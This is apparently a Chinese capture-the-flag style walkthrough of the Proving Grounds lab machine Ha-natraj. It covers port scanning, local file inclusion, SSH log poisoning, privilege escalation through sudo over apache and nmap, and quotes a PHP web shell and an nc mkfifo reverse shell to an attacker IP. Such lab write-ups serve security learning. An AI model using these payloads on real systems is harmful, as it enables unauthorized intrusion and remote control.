PG::Ha-natraj

nmap -Pn -p- -T4 --min-rate=1000 192.168.134.80
image.png
nmap -Pn -p 22,80 -sCV 192.168.134.80
image.png
查看80端口的页面
image.png
未发现可利用的信息,对路径进行爆破
image.png
在/console目录下发现file.php
image.png
测试发现有本地文件包含
image.png
未发现别的利用方式,结合之前做过的靶机,进行日志包含,经过测试发现ssh日志可以利用
image.png
image.png
ssh登录,发现可以读取phpinfo
image.png
把shell写进日志 ‘<?php system($_GET["cmd"]);?>’
image.png
反弹shell,这里的shell需要URL编码一下
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.134 4444 >/tmp/f
image.png
sudo -l发现可以对apache服务进行操作
image.png
上传linpeas脚本进行枚举
image.png
思路:替换apache文件执行的用户,然后上传一个php-reverse-shell到/var/www/html目录下,这样可以弹回该用户的shell。这里不能修改为root用户,是因为改为root服务无法启动。
拷贝文件至本地,添加用户
image.png
上传至靶机,并替换掉原文件
image.png
上传shell至网站根目录
image.png
重启apache服务,得到shell
image.png
image.png
image.png
利用nmap的sudo提权
https://gtfobins.github.io/gtfobins/nmap/#sudo
image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值